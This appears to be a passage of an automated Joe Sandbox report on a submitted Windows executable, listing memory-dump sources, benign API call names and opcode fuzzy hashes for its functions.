                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 485612231-0
                                                                        • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                        • Instruction ID: 7bdf76afeb1d6079c1863e70abe138991732fa551ad0982cc14e1fb230a8715a
                                                                        • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                        • Instruction Fuzzy Hash: 6FE08C20E69143C2FF08ABBAE80417D2691BF4CB49B448030CB0DCA272EE2CE5854708
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseErrorHandleLast
                                                                        • String ID:
                                                                        • API String ID: 918212764-0
                                                                        • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                        • Instruction ID: 9a865d95fe57717b3d689e70d1302ac5601e607ec264a84929aab43626d23555
                                                                        • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                        • Instruction Fuzzy Hash: 07118632F0C64245FEA4976CA5D827C16D57F9D7ACF540139DB2FC62F2DD6CA8458201
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Init_thread_footer
                                                                        • String ID:
                                                                        • API String ID: 1385522511-0
                                                                        • Opcode ID: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                        • Instruction ID: 1b97be30ebccbf935eb5ae4808a13f4d2d25604f812852ba40d878869424acf8
                                                                        • Opcode Fuzzy Hash: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                        • Instruction Fuzzy Hash: 5732AF62A0868296EB70CB1AD4502BE6761FB8DB8CF548132DB4D877B5EF7DE491C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ClearVariant
                                                                        • String ID:
                                                                        • API String ID: 1473721057-0
                                                                        • Opcode ID: cb3b563c9bae86d5fb57f226a3b9ee124728bc7809abe3ea7234cdf0d490f06d
                                                                        • Instruction ID: a01540639eeee218aa5ac017a6ae5440b9eb49d298d7c168bc3b904550cad4b7
                                                                        • Opcode Fuzzy Hash: cb3b563c9bae86d5fb57f226a3b9ee124728bc7809abe3ea7234cdf0d490f06d
                                                                        • Instruction Fuzzy Hash: 5D415832B08A419AEB219F69D4903AC23A0FB48B8CF544535CF0DA77AADF7CE495C340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule$AddressFreeLibraryProc
                                                                        • String ID:
                                                                        • API String ID: 3947729631-0
                                                                        • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                        • Instruction ID: 3c7f07c3511276dc5a73da4107dace223f58eb27f7a8df2fad40b44aa7cd61a4
                                                                        • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                        • Instruction Fuzzy Hash: 67418D61A1865286FA649F1DE9A12782365BF98B8CF444039DB0DC76F1DE7EE8418B40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                        • Instruction ID: 128d6651fda6a913d138a9bacee92a8953a5811e56e9d8e3b248219e629cf33d
                                                                        • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                        • Instruction Fuzzy Hash: 1F21A73261864287D7658F2DE4403B976A1FB89B98F144234DB9EC66E5DF2CD800C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                        • Instruction ID: b16bfbd4cb9e42528879efefa9ddfe8d739b362cd85edbc345a9061b4eda942e
                                                                        • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                        • Instruction Fuzzy Hash: 1521AA21A1C68281FA519F59D40127E5264BF4DB8CF144031EF4DEBBAADF7CD9418744
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                        • Instruction ID: 5fb688c30207f2f00f8ca2c2f9dae05a31e85e45156988e01af4a3a6c17c3380
                                                                        • Opcode Fuzzy Hash: cd67e12c883e9f8bd43024705065033ffad1d181a756db3b5eb2a2d32994f697
                                                                        • Instruction Fuzzy Hash: C6113A32D5C68686E620DB59A44167D62A5FB4C388F540535EB9DC67A9DF3CE8018708
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                        • Instruction ID: 45b989e115b76776cccd4718b50078e095a40c680a784ee33fa587fce11ad904
                                                                        • Opcode Fuzzy Hash: 69bddbc63fd99da0361e32bf605d9336e4230c0dde7f0018513f1afea8dd74fd
                                                                        • Instruction Fuzzy Hash: C7112B66619A4581EB549F19E0803797361FB88FA9F545132DF2E473B5CF3CE494CB00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                        • Instruction ID: 4055352e47544ef5da70f2091fed73d8109735aef24e7735835e9e3a3fe6970b
                                                                        • Opcode Fuzzy Hash: 9b30da4845d5eceae66a2d6d402695b56ede85308cac44f88c52346f0b0ebdab
                                                                        • Instruction Fuzzy Hash: 6911C27291C6868AEA159F58E4843BD7761FF88369F904132E74E4A6F6CFBCE005CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                        • Instruction ID: b823e1b6c7b3e2db49e1cf3fc667c5d7d7fc32e05900ff5ebf73c43b840577b1
                                                                        • Opcode Fuzzy Hash: 818d4f054f78961d0311f8415a74e8c04cfe353b78e3df62868af38b1621707f
                                                                        • Instruction Fuzzy Hash: 60014422E0860745FD24AA6D949337D11907F9D76CF241630EB2EDB2FACE7CE4418749
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3215553584-0
                                                                        • Opcode ID: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                        • Instruction ID: d6d629d5c5f03233e51658f650cfbd64408d9f3d90e5707b01c81cf2e965fa11
                                                                        • Opcode Fuzzy Hash: 2d4bb694f3344be1704f8fb2f3e9680fc63ca215821e8b9c9dcb21430b87e8c8
                                                                        • Instruction Fuzzy Hash: B3F09021A0C20386FD246BADA48327E2290BF4D75CF245130EB5EC66EECE3CE4428609
                                                                        APIs
                                                                          • Part of subcall function 00007FF6BB154970: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB154999
                                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF6BB16C8FE), ref: 00007FF6BB12656F
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 3938577545-0
                                                                        • Opcode ID: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                        • Instruction ID: 1bc52cf0aeba3ec4b9137f3d45f0861ec1ac1b5c822c00cdfea6509fea100731
                                                                        • Opcode Fuzzy Hash: 1616f9817ac4f342c8a27cae0d88970e89b0e161c3324b28999c931e150df169
                                                                        • Instruction Fuzzy Hash: AEF0F852A09A0586FF19DF79E0A633823A0FB5EF8CF140535DB1E8A2A9CF6CD854C341
                                                                        APIs
                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6BB144C5C
                                                                          • Part of subcall function 00007FF6BB145600: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6BB145609
                                                                          • Part of subcall function 00007FF6BB145600: _CxxThrowException.LIBVCRUNTIME ref: 00007FF6BB14561A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_taskExceptionThrowstd::bad_alloc::bad_alloc
                                                                        • String ID:
                                                                        • API String ID: 1680350287-0
                                                                        • Opcode ID: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                        • Instruction ID: b610e853a2b7081f272c22aab04a600dd57931029482396edaccfd970818a64e
                                                                        • Opcode Fuzzy Hash: fcccb4986ec6b07b19f565cd1119bb6721087df1cc262ad93f02db05b15ececb
                                                                        • Instruction Fuzzy Hash: 63E0ECA0E1D10745FE68B66E556607A01402F5C7BCE5C1B30EB3EE52F3BD1CB4514D14
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                        • Instruction ID: 11dc50d7cd2009a69fee8e856513def2ce75fb45d6f0bc1470fbbfd0608deb4a
                                                                        • Opcode Fuzzy Hash: a0a1439e265e291f150910246ad1a366446c83d0ba354e2dc0beef75c9ab4ebe
                                                                        • Instruction Fuzzy Hash: CFE03922608A9183D720CB06F44031EE370FB89BC8F544525EF8C47B2ACF7DC5528B80
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID:
                                                                        • API String ID: 82841172-0
                                                                        • Opcode ID: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                        • Instruction ID: 89a43286041ac56df39e3b97da5a6f8d8b2a4fbb55088ad9b2149385e17b5cbe
                                                                        • Opcode Fuzzy Hash: 637964e6b351f452a28879436c201a5e99f96031ec26c8877a7972d1003a59f1
                                                                        • Instruction Fuzzy Hash: 54E04822B0874685DB61976DF5453996365FB8C7C8F544032EF8C8376ADD6CC5958B00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_
                                                                        • String ID:
                                                                        • API String ID: 1144537725-0
                                                                        • Opcode ID: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                        • Instruction ID: ebc3113fdd416821a2d0c74d906a1cbc852dbe2fa72b9d71034760665acc2be3
                                                                        • Opcode Fuzzy Hash: 8549ef6000eb42c958f03a95ba6a5408167db34924d740ad0d6437c30ec5f920
                                                                        • Instruction Fuzzy Hash: 6EF08C21A19B868BE7759B58E44537A76A4F78C30CF880039D68D863AACE3DD305CF00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Open_onexit
                                                                        • String ID:
                                                                        • API String ID: 3030063568-0
                                                                        • Opcode ID: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                        • Instruction ID: 694b6bfb5fd2413bc97f268c16ee24e015b0e68db97477865af2be5391925a51
                                                                        • Opcode Fuzzy Hash: b140cdc24b49e8f2daa3c32c26d085363ec4fbb544eeb351244c2f0ff3a01b4f
                                                                        • Instruction Fuzzy Hash: 39E0C260F2A54F80EE08BB6DD9860750390BF5D30DF805536C20CC2371EE3CD2918B10
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _onexit
                                                                        • String ID:
                                                                        • API String ID: 572287377-0
                                                                        • Opcode ID: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                        • Instruction ID: 7d2597baad990d1e85b7d6ef8e4274556eb1d7cd3394a96f13bdb31b3bd3bdf9
                                                                        • Opcode Fuzzy Hash: 5447c473e94d7294484c99fc93f4d38cb7bf7a8a438e953c913b8a13f1fa59d2
                                                                        • Instruction Fuzzy Hash: D9C01211E6A04B81E50877BE4C9607801902FED30CF900135C20DD12B2DD1C52E64F21
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
